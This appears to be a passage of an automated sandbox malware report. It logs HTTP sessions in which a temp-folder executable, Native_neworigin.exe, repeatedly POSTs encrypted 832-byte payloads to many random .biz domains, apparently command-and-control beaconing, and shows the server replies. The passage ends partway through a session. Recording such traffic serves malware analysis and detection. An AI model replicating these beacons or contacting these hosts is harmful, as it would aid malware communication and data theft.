  Set-Cookie: btst=4e75cd09a21e76c1fbdeb5478f1a6ba5|8.46.123.75|1732094788|1732094788|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50014 | 18.141.10.107 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:29.286969900 CET | 345 | OUT | POST /cr HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: vcddkls.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 832
Nov 20, 2024 10:26:29.286969900 CET | 832 | OUT | Data Raw: a8 29 04 0d 16 be ee 99 34 03 00 00 2d 89 77 48 bb 8c c3 25 48 e8 b9 04 0d a4 be fc 2c 1f aa 03 db 9d ae 7f c8 c3 7c dd 64 86 37 ee ff 50 ba 40 07 0b 84 1e 0b 08 bd 03 17 4d 66 df 47 6d 58 a2 ba 80 af c4 6e 01 ba b8 e6 12 43 ab fe 3e b3 5b 70 db
  Data Ascii: )4-wH%H,|d7P@MfGmXnC>[p~GVz26?a~`cG'#uz6xGgYN&_JJ-d,(sJ_7{fxP`<U(K\_,!MSUv5I'8NV
Nov 20, 2024 10:26:30.666176081 CET | 409 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 20 Nov 2024 09:26:30 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=4447dbbe3548ccb8498dbdaf48dcdbaa|8.46.123.75|1732094790|1732094790|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50015 | 172.234.222.143 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:30.832493067 CET | 354 | OUT | POST /oiqbeltfrlpts HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: fwiwk.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 832
Nov 20, 2024 10:26:30.832518101 CET | 832 | OUT | Data Raw: 67 e5 be aa 30 a9 4a b4 34 03 00 00 36 16 ab a8 a7 51 9d 75 bd 38 0d 8c dd 3a 17 cf 69 4f 17 0f 3b 36 f3 90 b6 98 a9 11 44 87 84 a7 1d 41 db 1d 7f c5 60 96 bb 3c a9 f6 ea be 98 82 fe cc 4b 27 f7 ae eb 48 c3 95 86 13 b1 e8 2e cd 34 b9 ca 98 f8 18
  Data Ascii: g0J46Qu8:iO;6DA`<K'H.4X0U2y^-tdn3bS~[<?<-PQBr8,]`4#V!wv[v8NnyWmaM=?Fi<UDd&<b',s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50016 | 172.234.222.143 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:31.354562998 CET | 351 | OUT | POST /jwvwqanfys HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: fwiwk.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 832
Nov 20, 2024 10:26:31.354581118 CET | 832 | OUT | Data Raw: 39 e3 63 de 29 02 7b 71 34 03 00 00 2a 45 f5 47 84 03 46 f6 7f 02 6f 7c d5 fc 16 80 d3 39 76 cc 04 1d 58 fb e0 8f b2 fb d1 a3 48 f9 4c cf 78 1f 96 9f b6 f9 42 1f 49 39 8a 67 f9 ee b6 90 71 fa ab 3a 86 c9 bd 2b 24 94 d6 ef 85 78 52 e7 2d 7c ee c1
  Data Ascii: 9c){q4*EGFo|9vXHLxBI9gq:+$xR-|V~OB=@AW\]#O?c"gC,m&2_yoMAF>CF_f+\,$:lY@v\=.NEG+BT&K`Jf"P6$%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50017 | 34.246.200.160 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:32.153145075 CET | 352 | OUT | POST /rheljawehu HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: tbjrpv.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 832
Nov 20, 2024 10:26:32.153245926 CET | 832 | OUT | Data Raw: d3 33 57 91 a5 11 06 eb 34 03 00 00 53 08 8d 0c 00 55 ca 84 89 ef 43 d3 6e e2 2c 7d b8 0a 85 d1 d1 43 24 dd 3d b8 f0 3f 32 97 3b c3 43 8a 3f e4 d5 83 77 f4 be 87 cf a4 71 69 b4 19 fb 21 90 75 a8 3a ed b8 9f 9f a0 19 40 56 c3 de 34 9d f7 2b e8 46
  Data Ascii: 3W4SUCn,}C$=?2;C?wqi!u:@V4+F]sdE/uYEhiJOR(U{faUP]NR|iAu8xYI'w0GSFLG,>'iT*.^oJ G,TNn)tKA_+S=
Nov 20, 2024 10:26:32.896600008 CET | 408 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 20 Nov 2024 09:26:32 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=2b5c0abc6eeaf2397d4cfdb4c50c4d4a|8.46.123.75|1732094792|1732094792|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50018 | 18.208.156.248 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:33.089867115 CET | 344 | OUT | POST /jlc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: deoci.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:33.089900970 CET | 832 | OUT | Data Raw: 9a b1 96 1c d8 ec 4e fc 34 03 00 00 f5 97 24 dd 2a 67 f5 55 ba f9 72 1b 65 b4 ab e6 55 04 c6 cf 5a 4a 99 db 5f 23 64 9a 36 0f 58 f6 fa 15 0a 94 bd 87 20 ab e5 4a eb 94 c7 75 14 e8 ba 35 a0 36 b6 23 10 df 88 6f 19 e2 06 96 e2 b6 b9 63 97 b0 b5 51
    Data Ascii: N4$*gUreUZJ_#d6X Ju56#ocQ,D<JCpm5hHJTLHUZx`JQP9Mzi}rxc#Vaz%.!M"x ?*@m/~kE/^g0c;(jyVRHg-L
Nov 20, 2024 10:26:33.588474035 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f27689d4fbaf94fdfa3893c74535a811|8.46.123.75|1732094793|1732094793|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50019 | 208.100.26.245 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:33.725439072 CET | 346 | OUT | POST /iq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gytujflc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:33.725466013 CET | 832 | OUT | Data Raw: bc 3c 43 c6 e2 54 a0 02 34 03 00 00 9a d3 6f d0 79 2f ae 92 f0 4a 2e 18 fb 1c 91 9c 27 14 93 31 0f 08 a2 b8 04 cb fc 77 7a bf 84 9c db 61 02 76 e7 e2 d1 58 12 b7 0a 48 1e 6c 51 52 be f9 50 87 7c 4c 19 e4 81 f9 ac a6 d5 00 d1 a6 64 06 0a c0 00 8d
    Data Ascii: <CT4oy/J.'1wzavXHlQRP|LdATksNk/.B$WXB,v OSv4dU.hNXt7o\hmEH]7&ecXqWT@huQWEspGyx}$=9
Nov 20, 2024 10:26:34.231839895 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 20 Nov 2024 09:26:34 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 20, 2024 10:26:34.293111086 CET | 358 | OUT | POST /rofptsppofgiww HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gytujflc.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:34.293147087 CET | 832 | OUT | Data Raw: ad 92 d5 2a 00 71 f5 d4 34 03 00 00 a4 02 02 53 80 02 97 37 32 f6 c3 ab 9e 03 e3 9a 4d 97 dd fb 6b 2d a2 5b ed 34 f4 48 91 3e 03 53 71 5e 08 d4 ff c5 f0 44 dc 0e 8c 3d 17 c5 03 72 88 a4 9b f9 e0 36 be 63 a9 92 9f b4 c8 f8 85 0c b7 6c 9e e0 36 21
    Data Ascii: *q4S72Mk-[4H>Sq^D=r6cl6!}/X t(;w>Mr5Sl44ZlSr~g U(1?\1e&VdU``4cG0n<]P}r;3>
Nov 20, 2024 10:26:34.408735037 CET | 744 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 20 Nov 2024 09:26:34 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50020 | 13.251.16.150 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:34.559005976 CET | 354 | OUT | POST /uiwlhtxrxipw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: qaynky.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:34.559046030 CET | 832 | OUT | Data Raw: 94 51 20 12 cd d6 41 dd 34 03 00 00 ce 76 41 9b 13 d2 da a2 c1 9d c2 e9 bc 8e b7 96 af d4 f2 40 f8 7e 68 42 ff fc 5a ad 6c cf 8a 26 d0 d3 a8 a0 b1 00 8f 76 a0 85 d2 64 12 f0 f1 45 9e 9e 0d 95 04 90 f7 36 fc 2a 1b b2 82 8b 90 e9 a4 f3 8e fd b0 ae
    Data Ascii: Q A4vA@~hBZl&vdE6*!}u)m)UBwMg>>)F>E*oztzxc.eO)N_ si#c@)So.0XN&ajZb|c]
Nov 20, 2024 10:26:35.982280970 CET | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e741a1da368308280773996bca7da989|8.46.123.75|1732094795|1732094795|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50021 | 44.221.84.105 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:36.293088913 CET | 357 | OUT | POST /gvskbqofkpgv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: bumxkqgxu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:36.293121099 CET | 832 | OUT | Data Raw: bd ca 82 70 53 d4 48 b4 34 03 00 00 f2 07 f2 42 dd e0 8d 9a 8b 9b 95 e8 90 05 2a b3 21 e1 4e 1e fd 89 22 73 30 da 4c cc 89 f6 fc bd d6 5a 4c 2b 24 04 c6 cc 04 e1 34 9c 1e 4c 71 b8 61 f5 14 0d 3a f5 b7 fa ef fa 92 43 e6 1b 65 ac 59 c0 be 77 9b 67
    Data Ascii: pSH4B*!N"s0LZL+$4Lqa:CeYwg-o6VI'.\tYqT6n=]$xox*zwl<4Bx>kj-c3,)k&>eaKK->q}D:Y5?`p[|6d{='e_{
Nov 20, 2024 10:26:36.747081041 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c01eb1cbcf03999be4fb94e911b91315|8.46.123.75|1732094796|1732094796|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50022 | 54.244.188.177 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:36.918621063 CET | 357 | OUT | POST /sbnrqyxuvimud HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dwrqljrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:36.918658018 CET | 832 | OUT | Data Raw: 50 69 d4 5d 98 d6 fe cf 34 03 00 00 e7 94 a1 b4 b7 9c 7b cd 88 fa fa ec bb 29 b6 87 95 de 45 b7 84 05 49 2d 5e e9 66 01 74 3d b1 fc ec 8b b6 0d 0a 9a b5 0b f7 36 70 e4 c3 e0 3d 43 2c 35 2f 5e 8c a8 ad 37 1b e7 ec 28 e2 a6 b2 ff 41 35 a7 21 73 a8
    Data Ascii: Pi]4{)EI-^ft=6p=C,5/^7(A5!s_@F^9?`hH@e0mF#KJ_Chz'1Ds+m$ <}.cGqzFf{ClxwN"^IE`.Ft3tR@h)[|`KTM9qhUpX/od
Nov 20, 2024 10:26:37.644460917 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d665a79a45b690e40088704e42be4db1|8.46.123.75|1732094797|1732094797|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50023 | 35.164.78.200 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:37.915445089 CET | 343 | OUT | POST /s HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: nqwjmb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:37.915488958 CET | 832 | OUT | Data Raw: 33 96 0c bc a6 68 58 d4 34 03 00 00 e0 5d 7d ba d2 89 c5 85 1a b7 83 05 fb 5a 03 91 77 a9 e2 9f 16 8e bc 9c 84 8e 27 16 5b 0d 96 59 93 99 36 92 9d e0 5b 6b 9e 92 1e 50 b8 cc da d9 2e 0b 17 9c 1c 8f 90 9f b0 05 26 af bd d7 8c 02 1c 62 a6 31 f9 1b
    Data Ascii: 3hX4]}Zw'[Y6[kP.&b1{Y"d0Zz%jliyC%Pe<]Y\>Eh-e3en9Ib BlbAjoe 9{94pZ`<|$\e;b"_rS*
Nov 20, 2024 10:26:38.778750896 CET | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3d99bad8fb9f4999ed3cfde99b36aa3f|8.46.123.75|1732094798|1732094798|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 41
Source IP: 192.168.2.5
Source Port: 50024
Destination IP: 3.94.10.34
Destination Port: 80
PID: 2676
Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:39.011897087 CET | 349 | OUT | POST /qklr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ytctnunms.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:39.011897087 CET | 832 | OUT | Data Raw: 86 46 0b 60 62 8f dd 25 34 03 00 00 00 a2 6d 6c 43 10 92 e1 64 6f c2 dd e6 30 d2 41 7d 82 27 6c 52 11 52 77 f4 03 fd 29 49 4c 77 e1 66 9b ee 8d fb 10 b4 71 e7 85 da 87 60 1c f7 e3 33 e0 b8 08 98 3f f7 bd 0d 48 af f1 f6 2e bc 6f 7f df c8 ad 32 43
    Data Ascii: F`b%4mlCdo0A}'lRRw)ILwfq`3?H.o2Cp}3aS`XXW XqjA@rXF(r[4'kRu]M%CFO#CX>'ER@'zq(oikWPht9_V|so'qZ}~&_
Nov 20, 2024 10:26:39.477114916 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a71102566414a398ee16bbcf4a3bd5a9|8.46.123.75|1732094799|1732094799|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 42
Source IP: 192.168.2.5
Source Port: 50025
Destination IP: 165.160.15.20
Destination Port: 80
PID: 2676
Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:39.606312037 CET | 342 | OUT | POST /c HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: myups.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:39.606337070 CET | 832 | OUT | Data Raw: d5 43 14 02 07 b9 d3 a3 34 03 00 00 a0 f8 71 70 62 4b c4 ff be c3 07 80 c7 54 c1 ee 79 66 13 4e 32 10 46 c2 3d 56 57 85 45 61 0d 8a a5 42 d2 71 67 9a 6f d2 07 f7 e1 b3 ea 69 db 9d 15 70 96 9c 30 13 18 f9 b2 8c fa a9 24 ea c3 62 3b e7 b9 06 5a d1
    Data Ascii: C4qpbKTyfN2F=VWEaBqgoip0$b;Z~/q<_ -+^H2p[tVM|m50ZA9W&D%qnJImn9l9E *r@,#F'olIoh6_k]$l;UmdZ
Nov 20, 2024 10:26:40.369534016 CET | 170 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 09:26:40 GMT
    Content-Length: 94
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID: 43
Source IP: 192.168.2.5
Source Port: 50026
Destination IP: 165.160.15.20
Destination Port: 80
PID: 2676
Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:40.439343929 CET | 356 | OUT | POST /rjreynucnxubyan HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: myups.biz
